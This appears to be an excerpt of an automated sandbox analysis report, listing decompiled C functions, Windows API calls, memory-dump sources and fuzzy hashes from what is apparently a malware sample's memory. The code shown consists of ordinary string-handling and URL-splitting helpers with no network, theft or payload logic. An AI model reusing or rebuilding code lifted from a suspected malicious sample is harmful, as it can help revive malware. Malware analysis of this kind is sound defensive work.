                              • Opcode Fuzzy Hash: ec8f057af93b5217fa29db80c886d99d617e1ba591527655807e0cb832d26c6c
                              • Instruction Fuzzy Hash: 86312936900108EFCF129F99DD8589EBFB9FF44310F14455AF916AA261CB718A61EFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 58%
                              			E049D282F(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                              				intOrPtr* _v8;
                              				void* _t17;
                              				intOrPtr* _t22;
                              				void* _t27;
                              				char* _t30;
                              				void* _t33;
                              				void* _t34;
                              				void* _t36;
                              				void* _t37;
                              				void* _t39;
                              				int _t42;
                              
                              				_t17 = __eax;
                              				_t37 = 0;
                              				__imp__(_a4, _t33, _t36, _t27, __ecx);
                              				_t2 = _t17 + 1; // 0x1
                              				_t28 = _t2;
                              				_t34 = E049D55DC(_t2);
                              				if(_t34 != 0) {
                              					_t30 = E049D55DC(_t28);
                              					if(_t30 == 0) {
                              						E049D6DFA(_t34);
                              					} else {
                              						_t39 = _a4;
                              						_t22 = E049DAAD2(_t39);
                              						_v8 = _t22;
                              						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                              							_a4 = _t39;
                              						} else {
                              							_t26 = _t22 + 2;
                              							_a4 = _t22 + 2;
                              							_t22 = E049DAAD2(_t26);
                              							_v8 = _t22;
                              						}
                              						if(_t22 == 0) {
                              							__imp__(_t34, _a4);
                              							 *_t30 = 0x2f;
                              							 *((char*)(_t30 + 1)) = 0;
                              						} else {
                              							_t42 = _t22 - _a4;
                              							memcpy(_t34, _a4, _t42);
                              							 *((char*)(_t34 + _t42)) = 0;
                              							__imp__(_t30, _v8);
                              						}
                              						 *_a8 = _t34;
                              						_t37 = 1;
                              						 *_a12 = _t30;
                              					}
                              				}
                              				return _t37;
                              			}

                              APIs
                              • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,049D56E4,00000000,00000000,?,05819618,?,?,049D3B91,?,05819618), ref: 049D283B
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                                • Part of subcall function 049DAAD2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,049D2869,00000000,00000001,00000001,?,?,049D56E4,00000000,00000000,?,05819618), ref: 049DAAE0
                                • Part of subcall function 049DAAD2: StrChrA.SHLWAPI(?,0000003F,?,?,049D56E4,00000000,00000000,?,05819618,?,?,049D3B91,?,05819618,0000EA60,?), ref: 049DAAEA
                              • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,049D56E4,00000000,00000000,?,05819618,?,?,049D3B91), ref: 049D2899
                              • lstrcpy.KERNEL32(00000000,?), ref: 049D28A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 049D28B5
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                              • String ID:
                              • API String ID: 3767559652-0
                              • Opcode ID: fd4dab3f5c2375e2d4a86176eea26990340cb912f03e7c1e472e4ce227340921
                              • Instruction ID: 56221d6fbaadbf4dd706c0dfb03b1e2b21529be6ada707d94bceb836b91981b0
                              • Opcode Fuzzy Hash: fd4dab3f5c2375e2d4a86176eea26990340cb912f03e7c1e472e4ce227340921
                              • Instruction Fuzzy Hash: 0621A272504259BFDF025F64C844AAEBFA9EF85294F05C0B4F9099B201E734ED55D7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(747C81D0,00000008,?,00000000,?,?,053E2B07,747C81D0,747C81D0,00000000,00000008,0000EA60,74785520,?,?,053C329A), ref: 053D8EB8
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                                • Part of subcall function 053E849C: StrChrA.SHLWAPI(?,0000002F,00000000,747C81D0,053D8EE6,747C81D0,00000001,00000001,?,?,053E2B07,747C81D0,747C81D0,00000000,00000008,0000EA60), ref: 053E84AA
                                • Part of subcall function 053E849C: StrChrA.SHLWAPI(?,0000003F,?,?,053E2B07,747C81D0,747C81D0,00000000,00000008,0000EA60,74785520,?,?,053C329A,?,?), ref: 053E84B4
                              • memcpy.NTDLL(00000000,747C81D0,747C81D0,747C81D0,00000001,00000001,?,?,053E2B07,747C81D0,747C81D0,00000000,00000008,0000EA60,74785520), ref: 053D8F16
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 053D8F26
                              • lstrcpy.KERNEL32(00000000,747C81D0), ref: 053D8F32
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                              • String ID:
                              • API String ID: 3767559652-0
                              • Opcode ID: f50063bd11b24026b458cff52985c57a74f71e69e5fe012e18b14398797a3fa8
                              • Instruction ID: 2c153829580c377e786613ed1d64faa20f524ff73a7548f1f0042e0fb9b3fdf2
                              • Opcode Fuzzy Hash: f50063bd11b24026b458cff52985c57a74f71e69e5fe012e18b14398797a3fa8
                              • Instruction Fuzzy Hash: 9F215C73908255ABCB129F68E848BAEFFFEAF15290F054054F9059B242DA71DA1087B0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 88606a831818490d4dc6dcba95992888581799010516fa77a7e37b89fcee84fd
                              • Instruction ID: 8d419d271a5aa2b308aa1d6f2cd082d0058da564aee313f7efb66d16e1b706f5
                              • Opcode Fuzzy Hash: 88606a831818490d4dc6dcba95992888581799010516fa77a7e37b89fcee84fd
                              • Instruction Fuzzy Hash: 8011CEB2600919FBDB219FA1EC44E6ABF6CFF08304B050559F949A1840D3B2B9B1ABD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D5434(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                              				void* _v8;
                              				void* _t18;
                              				int _t25;
                              				int _t29;
                              				int _t34;
                              
                              				_t29 = lstrlenW(_a4);
                              				_t25 = lstrlenW(_a8);
                              				_t18 = E049D55DC(_t25 + _t29 + _t25 + _t29 + 2);
                              				_v8 = _t18;
                              				if(_t18 != 0) {
                              					_t34 = _t29 + _t29;
                              					memcpy(_t18, _a4, _t34);
                              					_t10 = _t25 + 2; // 0x2
                              					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                              				}
                              				return _v8;
                              			}
                              (address column of the listing above: 0x049d5449 to 0x049d548d)

                              APIs
                              • lstrlenW.KERNEL32(004F0053,?,74785520,00000008,058193AC,?,049D4CD5,004F0053,058193AC,?,?,?,?,?,?,049D50D9), ref: 049D5444
                              • lstrlenW.KERNEL32(049D4CD5,?,049D4CD5,004F0053,058193AC,?,?,?,?,?,?,049D50D9), ref: 049D544B
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • memcpy.NTDLL(00000000,004F0053,747869A0,?,?,049D4CD5,004F0053,058193AC,?,?,?,?,?,?,049D50D9), ref: 049D546B
                              • memcpy.NTDLL(747869A0,049D4CD5,00000002,00000000,004F0053,747869A0,?,?,049D4CD5,004F0053,058193AC), ref: 049D547E
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: lstrlenmemcpy$AllocateHeap
                              • String ID:
                              • API String ID: 2411391700-0
                              • Opcode ID: 934fb915eb99af7e93de0c4088fe5c5b971d134272750533066820f75a6b42a9
                              • Instruction ID: f597b672b20e58f2c9eb10ae5d0e7014135d0312796ca1b2a784d30814fc1b35
                              • Opcode Fuzzy Hash: 934fb915eb99af7e93de0c4088fe5c5b971d134272750533066820f75a6b42a9
                              • Instruction Fuzzy Hash: CAF04F36900118BFCF11EFA8CC44CDE7BACEF482A8B118062FD04D7111E775EA108BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(69B25F44,?,?,00000000,053D069E,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 053D952F
                              • lstrlen.KERNEL32(?,?,?,00000000,053D069E,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 053D9534
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • memcpy.NTDLL(00000000,?,00000000,?,?,?,00000000,053D069E,00000000,?,?,00000000,69B25F44,?,?,?), ref: 053D9550
                              • lstrcpy.KERNEL32(00000000,?), ref: 053D956E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                              • String ID:
                              • API String ID: 1697500751-0
                              • Opcode ID: 967530e39dcf3c89a8cebbfba4e4f54f8d6c70dd8c9e64329ecd1355aa1e82d8
                              • Instruction ID: f86c5f6a0e5a6589c74dacac3b16a0b93ffdb7348a217afa16600f763f748140
                              • Opcode Fuzzy Hash: 967530e39dcf3c89a8cebbfba4e4f54f8d6c70dd8c9e64329ecd1355aa1e82d8
                              • Instruction Fuzzy Hash: 65F0C27B904741ABD3229AA9AC4CF5BBFADBF85251F050525F94587101D671C5048BB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(05819B58,00000000,00000000,?,049D6507,00000000), ref: 049D6F7D
                              • lstrlen.KERNEL32(?), ref: 049D6F85
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • lstrcpy.KERNEL32(00000000,05819B58), ref: 049D6F99
                              • lstrcat.KERNEL32(00000000,?), ref: 049D6FA4
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                              • String ID:
                              • API String ID: 74227042-0
                              • Opcode ID: effc7c3e6db9b41294155c6ff4f221218eb21b3f658e2cf9dd69ec8458c26f18
                              • Instruction ID: fde4b6aed97efd1fa7f1283a5e94b4a6bb9bad05c0f9ef1caf54049ed5a44eeb
                              • Opcode Fuzzy Hash: effc7c3e6db9b41294155c6ff4f221218eb21b3f658e2cf9dd69ec8458c26f18
                              • Instruction Fuzzy Hash: 15E0923350A6216B8A119FE8DC48C9FBFADEF996617040536F600D3100C7289C45CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(064F8560,00000000,00000000,74785520,053DF2A8,00000000), ref: 053D3EB2
                              • lstrlen.KERNEL32(?), ref: 053D3EBA
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • lstrcpy.KERNEL32(00000000,064F8560), ref: 053D3ECE
                              • lstrcat.KERNEL32(00000000,?), ref: 053D3ED9
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                              • String ID:
                              • API String ID: 74227042-0
                              • Opcode ID: 89bc2b5908f356035958eaa0a66604d8de38bdd734d884b1122771a841704533
                              • Instruction ID: 7b601441c682462d2b6294694c24049fd24cd9f9f82a8c7a9214ab22065dfabb
                              • Opcode Fuzzy Hash: 89bc2b5908f356035958eaa0a66604d8de38bdd734d884b1122771a841704533
                              • Instruction Fuzzy Hash: 8CE0ED73A116256B87229AE8AC4CCABFFACEFC9751B05041AF601DB100DB659D058BA1
                              Uniqueness

                              Uniqueness Score: -1.00%